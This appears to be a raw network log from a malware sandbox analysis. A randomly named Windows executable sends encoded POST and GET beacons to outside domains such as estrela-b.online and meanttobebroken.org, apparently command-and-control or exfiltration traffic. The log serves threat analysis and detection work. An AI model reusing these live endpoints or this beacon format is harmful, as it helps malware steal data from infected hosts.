                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Oct 24, 2024 15:30:32.736443043 CEST403INHTTP/1.1 200 OK
                                                                                            Server: openresty
                                                                                            Date: Thu, 24 Oct 2024 13:30:32 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 263
                                                                                            Connection: close
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 70 5a 78 74 75 78 3d 67 73 4d 56 6d 4e 50 4a 38 4e 39 53 53 73 4a 68 76 7a 67 66 7a 77 77 6a 71 65 30 37 43 58 6c 30 73 56 4b 71 4e 6e 7a 4e 4d 44 68 36 74 4e 39 4f 55 56 35 67 31 5a 68 4b 72 2f 4d 66 6b 67 47 69 48 41 50 58 62 4b 55 55 70 57 62 37 4f 5a 64 77 49 74 4f 41 57 34 59 59 6d 41 33 69 54 72 35 35 4a 68 4f 53 65 67 66 49 63 4d 44 39 45 38 66 55 50 67 2f 65 4e 74 70 73 32 78 59 47 6c 42 49 6c 70 67 3d 3d 26 43 36 3d 45 58 6b 54 62 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?pZxtux=gsMVmNPJ8N9SSsJhvzgfzwwjqe07CXl0sVKqNnzNMDh6tN9OUV5g1ZhKr/MfkgGiHAPXbKUUpWb7OZdwItOAW4YYmA3iTr55JhOSegfIcMD9E8fUPg/eNtps2xYGlBIlpg==&C6=EXkTb"}</script></head></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            13192.168.2.549996162.241.63.77803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:30:38.088742971 CEST688OUTPOST /62tt/ HTTP/1.1
                                                                                            Host: www.estrela-b.online
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.estrela-b.online
                                                                                            Referer: http://www.estrela-b.online/62tt/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 207
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Raw: 70 5a 78 74 75 78 3d 37 63 35 58 52 59 62 6d 77 4d 61 44 34 6e 63 57 49 6f 54 4e 6c 6f 72 79 76 69 57 36 57 68 34 49 61 42 47 32 45 41 56 6a 48 4e 65 5a 77 4f 7a 68 77 65 56 6e 75 78 71 4a 4b 55 54 4a 4e 44 64 54 4e 35 4f 35 62 7a 43 38 66 49 57 30 68 47 79 54 76 38 44 6d 77 36 59 4d 46 48 54 42 6b 65 31 58 75 4b 5a 77 33 54 68 56 32 37 69 57 71 46 62 37 53 30 46 4d 73 7a 30 55 53 57 59 63 53 79 4d 4d 6b 4b 73 42 51 71 61 6f 46 55 4c 55 6a 6f 72 6e 73 63 51 45 6b 70 6e 75 50 78 61 68 2f 6c 47 73 68 49 4c 79 57 47 30 2f 64 69 73 38 52 56 57 58 6f 79 57 65 69 6b 38 2b 6b 2b 41 2f 6b 47 53 50 54 6b 65 4d 31 63 6f 3d
                                                                                            Data Ascii: pZxtux=7c5XRYbmwMaD4ncWIoTNloryviW6Wh4IaBG2EAVjHNeZwOzhweVnuxqJKUTJNDdTN5O5bzC8fIW0hGyTv8Dmw6YMFHTBke1XuKZw3ThV27iWqFb7S0FMsz0USWYcSyMMkKsBQqaoFULUjornscQEkpnuPxah/lGshILyWG0/dis8RVWXoyWeik8+k+A/kGSPTkeM1co=
                                                                                            Oct 24, 2024 15:30:38.835983992 CEST1236INHTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:30:38 GMT
                                                                                            Server: Apache
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Upgrade: h2,h2c
                                                                                            Connection: Upgrade
                                                                                            Vary: Accept-Encoding
                                                                                            Content-Encoding: gzip
                                                                                            X-Newfold-Cache-Level: 2
                                                                                            X-Endurance-Cache-Level: 2
                                                                                            X-nginx-cache: WordPress
                                                                                            Content-Length: 1168
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 c9 d2 61 70 64 17 5d 37 ac 03 d6 ad 58 06 14 7b 2a 28 f1 5a 62 43 f1 72 24 65 d9 1d fa df 77 a9 0f c7 49 da a1 eb 84 04 92 ef e7 b9 e7 9c e2 d1 0f bf 3d ff e3 cf 57 3f b2 26 b6 66 b3 28 d2 8b 19 69 eb 75 e6 22 ff fe f7 6c b3 38 2b 1a 90 8a de 67 45 0b 51 32 2b 5b 58 67 3b 0d bd 43 1f 33 56 a1 8d 60 e3 3a eb b5 8a cd 5a c1 4e 57 c0 87 1f d9 fd 2e 8f 25 c6 70 d2 63 51 5b 05 fb af 99 c5 2d 1a 83 7d c6 c4 d0 14 75 34 b0 79 09 1d 0b 3a 02 7b dc 2a 19 9a 2b f6 1c 5b 6d 6b 76 8d 68 0b 31 d6 a4 ea 50 79 ed 22 0b be 5a 67 4d 8c 6e 25 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 30 bd f2 b7 21 db 14 62 1c 33 4e 8c 07 03 2c 1e 1c a1 8e b0 8f a2 0a 54 f2 15 fb 7b c1 e8 29 71 cf 83 7e 47 50 56 f4 ed 15 78 4e a1 ab 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 8f d6 bc 5f 2c 4a 54 87 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e c5 fa 86 18 19 47 4d 91 d2 50 d1 18 c1 1d f8 2d f1 c8 f7 2b d6 68 a5 c0 8e f1 56 fa 5a db 15 5b [TRUNCATED]
                                                                                            Data Ascii: R]o6}a}Fapd]7X{*(ZbCr$ewI=W?&f(iu"l8+gEQ2+[Xg;C3V`:ZNW.%pcQ[-}u4y:{*+[mkvh1Py"ZgMn%H^h zL W0!b3N,T{)q~GPVxN![|F_,JTynjUB~GMP-+hVZ[titm9lUE<mzR7VS-]P|9Tjd9Nur?l./n$nH)KXHfHzj2FllL4mfCHe#5IyB,NcH#-AC9O[-<wK$K?z5rt1Sp+Q#vUe5[iP5/.Tt|43V+e&NV<nT7D[>r;_6D`@XaJ$/s)@g:b7!@ *lpm^t2&,h@*,JT*1Y0Z-^gl:l+CKXY4gWk+O|k K.6?b
                                                                                            Oct 24, 2024 15:30:38.836030960 CEST330INData Raw: ba c2 dd 02 49 85 e9 b2 37 89 ce 90 6d 0a 79 42 61 20 0e fb be cf 8f cc e4 d4 20 c8 e3 b5 28 3b 6d 14 ef 09 85 4b 28 c8 d3 65 48 e2 d6 9d 56 20 32 16 c9 bc 10 d7 d9 9b d2 48 7b 93 8d 42 59 44 07 16 3c 29 4a 3b c0 fb e1 73 8b c6 60 9f 6d 5e 60 4f
                                                                                            Data Ascii: I7myBa (;mK(eHV 2H{BYD<)J;s`m^`Oddvz_)JO28H[]a09#L!1mi)bnyz"{0/h"#'7?c@J+i)OLaF


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            14192.168.2.549997162.241.63.77803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:30:40.639650106 CEST708OUTPOST /62tt/ HTTP/1.1
                                                                                            Host: www.estrela-b.online
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.estrela-b.online
                                                                                            Referer: http://www.estrela-b.online/62tt/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 227
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Raw: 70 5a 78 74 75 78 3d 37 63 35 58 52 59 62 6d 77 4d 61 44 35 48 4d 57 50 50 2f 4e 6a 49 72 31 71 69 57 36 5a 42 34 4d 61 42 43 32 45 46 30 34 48 2f 36 5a 7a 76 44 68 78 66 56 6e 70 78 71 4a 42 30 54 49 53 54 63 66 4e 35 53 62 62 33 4b 38 66 4d 32 30 68 48 69 54 75 50 72 68 78 71 59 4b 65 33 54 44 67 65 31 58 75 4b 5a 77 33 51 64 7a 32 37 36 57 71 31 4c 37 53 57 74 50 77 44 30 58 56 57 59 63 57 79 4d 49 6b 4b 73 33 51 76 7a 7a 46 58 6a 55 6a 71 6a 6e 73 75 6f 48 74 70 6e 6b 42 52 62 53 32 48 33 62 37 49 50 6d 65 6e 31 6f 44 52 77 39 5a 44 6e 39 79 51 65 32 78 45 51 47 30 74 49 49 31 32 7a 6d 4a 48 4f 38 72 4c 38 7a 67 44 4c 59 45 5a 44 4e 38 30 55 62 67 42 77 58 46 50 54 68
                                                                                            Data Ascii: pZxtux=7c5XRYbmwMaD5HMWPP/NjIr1qiW6ZB4MaBC2EF04H/6ZzvDhxfVnpxqJB0TISTcfN5Sbb3K8fM20hHiTuPrhxqYKe3TDge1XuKZw3Qdz276Wq1L7SWtPwD0XVWYcWyMIkKs3QvzzFXjUjqjnsuoHtpnkBRbS2H3b7IPmen1oDRw9ZDn9yQe2xEQG0tII12zmJHO8rL8zgDLYEZDN80UbgBwXFPTh
                                                                                            Oct 24, 2024 15:30:41.357713938 CEST1236INHTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:30:41 GMT
                                                                                            Server: Apache
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Upgrade: h2,h2c
                                                                                            Connection: Upgrade
                                                                                            Vary: Accept-Encoding
                                                                                            Content-Encoding: gzip
                                                                                            X-Newfold-Cache-Level: 2
                                                                                            X-Endurance-Cache-Level: 2
                                                                                            X-nginx-cache: WordPress
                                                                                            Content-Length: 1168
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 c9 d2 61 70 64 17 5d 37 ac 03 d6 ad 58 06 14 7b 2a 28 f1 5a 62 43 f1 72 24 65 d9 1d fa df 77 a9 0f c7 49 da a1 eb 84 04 92 ef e7 b9 e7 9c e2 d1 0f bf 3d ff e3 cf 57 3f b2 26 b6 66 b3 28 d2 8b 19 69 eb 75 e6 22 ff fe f7 6c b3 38 2b 1a 90 8a de 67 45 0b 51 32 2b 5b 58 67 3b 0d bd 43 1f 33 56 a1 8d 60 e3 3a eb b5 8a cd 5a c1 4e 57 c0 87 1f d9 fd 2e 8f 25 c6 70 d2 63 51 5b 05 fb af 99 c5 2d 1a 83 7d c6 c4 d0 14 75 34 b0 79 09 1d 0b 3a 02 7b dc 2a 19 9a 2b f6 1c 5b 6d 6b 76 8d 68 0b 31 d6 a4 ea 50 79 ed 22 0b be 5a 67 4d 8c 6e 25 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 30 bd f2 b7 21 db 14 62 1c 33 4e 8c 07 03 2c 1e 1c a1 8e b0 8f a2 0a 54 f2 15 fb 7b c1 e8 29 71 cf 83 7e 47 50 56 f4 ed 15 78 4e a1 ab 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 8f d6 bc 5f 2c 4a 54 87 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e c5 fa 86 18 19 47 4d 91 d2 50 d1 18 c1 1d f8 2d f1 c8 f7 2b d6 68 a5 c0 8e f1 56 fa 5a db 15 5b [TRUNCATED]
                                                                                            Data Ascii: R]o6}a}Fapd]7X{*(ZbCr$ewI=W?&f(iu"l8+gEQ2+[Xg;C3V`:ZNW.%pcQ[-}u4y:{*+[mkvh1Py"ZgMn%H^h zL W0!b3N,T{)q~GPVxN![|F_,JTynjUB~GMP-+hVZ[titm9lUE<mzR7VS-]P|9Tjd9Nur?l./n$nH)KXHfHzj2FllL4mfCHe#5IyB,NcH#-AC9O[-<wK$K?z5rt1Sp+Q#vUe5[iP5/.Tt|43V+e&NV<nT7D[>r;_6D`@XaJ$/s)@g:b7!@ *lpm^t2&,h@*,JT*1Y0Z-^gl:l+CKXY4gWk+O|k K.6?b
                                                                                            Oct 24, 2024 15:30:41.357779026 CEST330INData Raw: ba c2 dd 02 49 85 e9 b2 37 89 ce 90 6d 0a 79 42 61 20 0e fb be cf 8f cc e4 d4 20 c8 e3 b5 28 3b 6d 14 ef 09 85 4b 28 c8 d3 65 48 e2 d6 9d 56 20 32 16 c9 bc 10 d7 d9 9b d2 48 7b 93 8d 42 59 44 07 16 3c 29 4a 3b c0 fb e1 73 8b c6 60 9f 6d 5e 60 4f
                                                                                            Data Ascii: I7myBa (;mK(eHV 2H{BYD<)J;s`m^`Oddvz_)JO28H[]a09#L!1mi)bnyz"{0/h"#'7?c@J+i)OLaF


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            15192.168.2.549998162.241.63.77803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:30:43.187164068 CEST1725OUTPOST /62tt/ HTTP/1.1
                                                                                            Host: www.estrela-b.online
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.estrela-b.online
                                                                                            Referer: http://www.estrela-b.online/62tt/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 1243
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Raw: 70 5a 78 74 75 78 3d 37 63 35 58 52 59 62 6d 77 4d 61 44 35 48 4d 57 50 50 2f 4e 6a 49 72 31 71 69 57 36 5a 42 34 4d 61 42 43 32 45 46 30 34 48 2f 79 5a 77 63 4c 68 78 38 39 6e 6f 78 71 4a 4d 55 54 4e 53 54 63 57 4e 35 4b 66 62 33 47 4b 66 4b 36 30 6a 6c 36 54 6d 65 72 68 37 71 59 4b 42 48 54 47 6b 65 31 65 75 4b 49 35 33 51 4e 7a 32 37 36 57 71 33 44 37 43 55 46 50 6a 54 30 55 53 57 59 51 53 79 4d 73 6b 4b 55 6e 51 76 2b 47 45 6e 44 55 69 4a 4c 6e 75 37 45 48 69 70 6e 71 47 52 62 4b 32 48 37 45 37 49 44 51 65 6e 52 4f 44 52 59 39 49 47 66 72 68 43 69 57 77 46 45 31 6d 64 6b 4b 73 77 72 6c 57 33 58 49 70 6f 63 74 71 67 33 64 4a 70 2b 41 78 31 78 44 78 56 4d 43 48 35 76 72 78 65 68 2b 59 77 6d 38 47 36 73 4d 4d 4b 44 76 63 7a 49 75 56 37 68 61 35 55 72 43 51 66 4f 37 4e 52 61 6c 30 32 39 52 6e 56 6d 47 48 2f 57 58 36 52 6b 6a 58 33 72 54 79 2f 68 48 32 73 32 4e 43 34 52 61 66 32 35 56 6e 63 65 70 44 54 6f 65 30 31 37 55 68 31 44 78 4f 61 67 76 64 71 76 33 49 62 41 69 48 78 34 34 76 71 66 51 63 49 51 [TRUNCATED]
                                                                                            Data Ascii: pZxtux=7c5XRYbmwMaD5HMWPP/NjIr1qiW6ZB4MaBC2EF04H/yZwcLhx89noxqJMUTNSTcWN5Kfb3GKfK60jl6Tmerh7qYKBHTGke1euKI53QNz276Wq3D7CUFPjT0USWYQSyMskKUnQv+GEnDUiJLnu7EHipnqGRbK2H7E7IDQenRODRY9IGfrhCiWwFE1mdkKswrlW3XIpoctqg3dJp+Ax1xDxVMCH5vrxeh+Ywm8G6sMMKDvczIuV7ha5UrCQfO7NRal029RnVmGH/WX6RkjX3rTy/hH2s2NC4Raf25VncepDToe017Uh1DxOagvdqv3IbAiHx44vqfQcIQiw4sbt8EUpBQeXjIM4MoKO9oUdBGBEX/OgD1hZz3a1fFZzDGBN2hGkjvMRnz1/oAmS93TKxO4SCy/T0sEBUmGm91UQXAOxgF0qRJzejjypR3A0+a4EC4ynGdZsNIjmmdVz92O8iF7E/hLxSDoD1z+f28dkzubLeeNNmCYBoLnvgXnAKZFiT1xtjAE5uPYGx2NHxdefts/E1vzW2PYffeqjOeXtO14wZ6ogbXad6XvJN1IW/VUotBD3TDzk6ZaD//xBOaAG2dTwcCXF+b/EPn3HXf/78QiROK5cJ3/yoHtvvnrg5GlqnwkGVBRawzc3RacLUTBb+hvjOwYw3i88tPhefLNm1Tsj7RFNkTlO2AzPrJqP/H0DzWYkdhqcD/yw3UTnjR0mrM8+I7M2yoCYgzcngKDDUoCn4YWl/ejNkoSalJqtAaOCfshmqiGX4xfh3lhX/THX1NaBqpo/ET+mB+r6F/jsEfma1xwY3uSdUTJh9K7yLyjo4mz1CDdAiYWQVEyvTJpziuzOan3tr7d0paWzh8mPaUOhDMcV04r81yCI/wJ7P5aWaRh8ZmLA3+Nxb6iF0PuqyywP+lZ+pXyI4uSO75EhqnMOKR+tPV1rAQxEeqhLWG8A1NTPg0LhhNgQazmDjATMdDTYe5WC6O5RwRKk1bx7SUVbA3Fn [TRUNCATED]
                                                                                            Oct 24, 2024 15:30:43.924860001 CEST1236INHTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:30:43 GMT
                                                                                            Server: Apache
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Upgrade: h2,h2c
                                                                                            Connection: Upgrade
                                                                                            Vary: Accept-Encoding
                                                                                            Content-Encoding: gzip
                                                                                            X-Newfold-Cache-Level: 2
                                                                                            X-Endurance-Cache-Level: 2
                                                                                            X-nginx-cache: WordPress
                                                                                            Content-Length: 1168
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 c9 d2 61 70 64 17 5d 37 ac 03 d6 ad 58 06 14 7b 2a 28 f1 5a 62 43 f1 72 24 65 d9 1d fa df 77 a9 0f c7 49 da a1 eb 84 04 92 ef e7 b9 e7 9c e2 d1 0f bf 3d ff e3 cf 57 3f b2 26 b6 66 b3 28 d2 8b 19 69 eb 75 e6 22 ff fe f7 6c b3 38 2b 1a 90 8a de 67 45 0b 51 32 2b 5b 58 67 3b 0d bd 43 1f 33 56 a1 8d 60 e3 3a eb b5 8a cd 5a c1 4e 57 c0 87 1f d9 fd 2e 8f 25 c6 70 d2 63 51 5b 05 fb af 99 c5 2d 1a 83 7d c6 c4 d0 14 75 34 b0 79 09 1d 0b 3a 02 7b dc 2a 19 9a 2b f6 1c 5b 6d 6b 76 8d 68 0b 31 d6 a4 ea 50 79 ed 22 0b be 5a 67 4d 8c 6e 25 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 30 bd f2 b7 21 db 14 62 1c 33 4e 8c 07 03 2c 1e 1c a1 8e b0 8f a2 0a 54 f2 15 fb 7b c1 e8 29 71 cf 83 7e 47 50 56 f4 ed 15 78 4e a1 ab 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 8f d6 bc 5f 2c 4a 54 87 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e c5 fa 86 18 19 47 4d 91 d2 50 d1 18 c1 1d f8 2d f1 c8 f7 2b d6 68 a5 c0 8e f1 56 fa 5a db 15 5b [TRUNCATED]
                                                                                            Data Ascii: R]o6}a}Fapd]7X{*(ZbCr$ewI=W?&f(iu"l8+gEQ2+[Xg;C3V`:ZNW.%pcQ[-}u4y:{*+[mkvh1Py"ZgMn%H^h zL W0!b3N,T{)q~GPVxN![|F_,JTynjUB~GMP-+hVZ[titm9lUE<mzR7VS-]P|9Tjd9Nur?l./n$nH)KXHfHzj2FllL4mfCHe#5IyB,NcH#-AC9O[-<wK$K?z5rt1Sp+Q#vUe5[iP5/.Tt|43V+e&NV<nT7D[>r;_6D`@XaJ$/s)@g:b7!@ *lpm^t2&,h@*,JT*1Y0Z-^gl:l+CKXY4gWk+O|k K.6?b
                                                                                            Oct 24, 2024 15:30:43.924890041 CEST330INData Raw: ba c2 dd 02 49 85 e9 b2 37 89 ce 90 6d 0a 79 42 61 20 0e fb be cf 8f cc e4 d4 20 c8 e3 b5 28 3b 6d 14 ef 09 85 4b 28 c8 d3 65 48 e2 d6 9d 56 20 32 16 c9 bc 10 d7 d9 9b d2 48 7b 93 8d 42 59 44 07 16 3c 29 4a 3b c0 fb e1 73 8b c6 60 9f 6d 5e 60 4f
                                                                                            Data Ascii: I7myBa (;mK(eHV 2H{BYD<)J;s`m^`Oddvz_)JO28H[]a09#L!1mi)bnyz"{0/h"#'7?c@J+i)OLaF


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            16192.168.2.549999162.241.63.77803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:30:45.731126070 CEST417OUTGET /62tt/?C6=EXkTb&pZxtux=2eR3StT9zNfU5ywUIZ2bgc3wtAC6ZBxlVhDhLCkeE+XsifzX8e145y6CEXHpSzhKOpTYXTK9W4/Sjnixpdzg8oxocmzQgcw2k7hIxSEQ8Yn0gG/bTm5M3gQ9SHUsYy5BmA== HTTP/1.1
                                                                                            Host: www.estrela-b.online
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Connection: close
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Oct 24, 2024 15:30:47.324660063 CEST584INHTTP/1.1 301 Moved Permanently
                                                                                            Date: Thu, 24 Oct 2024 13:30:46 GMT
                                                                                            Server: nginx/1.23.4
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 0
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            X-Redirect-By: WordPress
                                                                                            Location: http://estrela-b.online/62tt/?C6=EXkTb&pZxtux=2eR3StT9zNfU5ywUIZ2bgc3wtAC6ZBxlVhDhLCkeE+XsifzX8e145y6CEXHpSzhKOpTYXTK9W4/Sjnixpdzg8oxocmzQgcw2k7hIxSEQ8Yn0gG/bTm5M3gQ9SHUsYy5BmA==
                                                                                            X-Newfold-Cache-Level: 2
                                                                                            X-Endurance-Cache-Level: 2
                                                                                            X-nginx-cache: WordPress
                                                                                            X-Server-Cache: true
                                                                                            X-Proxy-Cache: MISS
                                                                                            Oct 24, 2024 15:30:47.325606108 CEST584INHTTP/1.1 301 Moved Permanently
                                                                                            Date: Thu, 24 Oct 2024 13:30:46 GMT
                                                                                            Server: nginx/1.23.4
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 0
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            X-Redirect-By: WordPress
                                                                                            Location: http://estrela-b.online/62tt/?C6=EXkTb&pZxtux=2eR3StT9zNfU5ywUIZ2bgc3wtAC6ZBxlVhDhLCkeE+XsifzX8e145y6CEXHpSzhKOpTYXTK9W4/Sjnixpdzg8oxocmzQgcw2k7hIxSEQ8Yn0gG/bTm5M3gQ9SHUsYy5BmA==
                                                                                            X-Newfold-Cache-Level: 2
                                                                                            X-Endurance-Cache-Level: 2
                                                                                            X-nginx-cache: WordPress
                                                                                            X-Server-Cache: true
                                                                                            X-Proxy-Cache: MISS
                                                                                            Oct 24, 2024 15:30:47.327075005 CEST584INHTTP/1.1 301 Moved Permanently
                                                                                            Date: Thu, 24 Oct 2024 13:30:46 GMT
                                                                                            Server: nginx/1.23.4
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 0
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            X-Redirect-By: WordPress
                                                                                            Location: http://estrela-b.online/62tt/?C6=EXkTb&pZxtux=2eR3StT9zNfU5ywUIZ2bgc3wtAC6ZBxlVhDhLCkeE+XsifzX8e145y6CEXHpSzhKOpTYXTK9W4/Sjnixpdzg8oxocmzQgcw2k7hIxSEQ8Yn0gG/bTm5M3gQ9SHUsYy5BmA==
                                                                                            X-Newfold-Cache-Level: 2
                                                                                            X-Endurance-Cache-Level: 2
                                                                                            X-nginx-cache: WordPress
                                                                                            X-Server-Cache: true
                                                                                            X-Proxy-Cache: MISS


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            17192.168.2.550000141.193.213.11803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:30:56.762798071 CEST697OUTPOST /zdt7/ HTTP/1.1
                                                                                            Host: www.meanttobebroken.org
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.meanttobebroken.org
                                                                                            Referer: http://www.meanttobebroken.org/zdt7/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 207
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Raw: 70 5a 78 74 75 78 3d 44 66 61 7a 76 70 70 51 61 4c 44 51 46 39 43 57 6f 56 6e 74 42 49 72 30 2f 43 45 51 72 68 53 39 79 73 6f 44 47 33 43 6d 71 4d 46 74 45 62 4c 48 63 79 63 55 59 41 6b 33 69 6a 4a 54 57 46 39 77 59 74 67 4b 65 56 35 6a 37 72 70 41 6a 59 6a 69 56 69 33 4d 2b 69 70 35 51 56 74 46 72 41 31 30 6f 64 41 34 6e 49 64 66 59 36 35 63 37 34 69 64 47 34 45 2f 52 66 32 38 6a 73 59 4e 47 6b 7a 4f 6f 4a 44 39 6e 62 7a 4c 4e 53 45 71 35 77 4e 6d 66 67 58 57 58 56 55 6b 41 39 2f 70 70 50 5a 69 57 78 4c 56 36 43 6b 34 68 4a 48 76 69 70 42 31 61 6a 70 30 45 4f 79 62 4c 48 78 63 79 79 6a 53 65 43 38 6c 68 6b 41 3d
                                                                                            Data Ascii: pZxtux=DfazvppQaLDQF9CWoVntBIr0/CEQrhS9ysoDG3CmqMFtEbLHcycUYAk3ijJTWF9wYtgKeV5j7rpAjYjiVi3M+ip5QVtFrA10odA4nIdfY65c74idG4E/Rf28jsYNGkzOoJD9nbzLNSEq5wNmfgXWXVUkA9/ppPZiWxLV6Ck4hJHvipB1ajp0EOybLHxcyyjSeC8lhkA=
                                                                                            Oct 24, 2024 15:30:57.455123901 CEST1236INHTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:30:57 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            Vary: Accept-Encoding
                                                                                            x-powered-by: WP Engine
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d7a530c0bb2ea02-DFW
                                                                                            Content-Encoding: gzip
                                                                                            alt-svc: h3=":443"; ma=86400
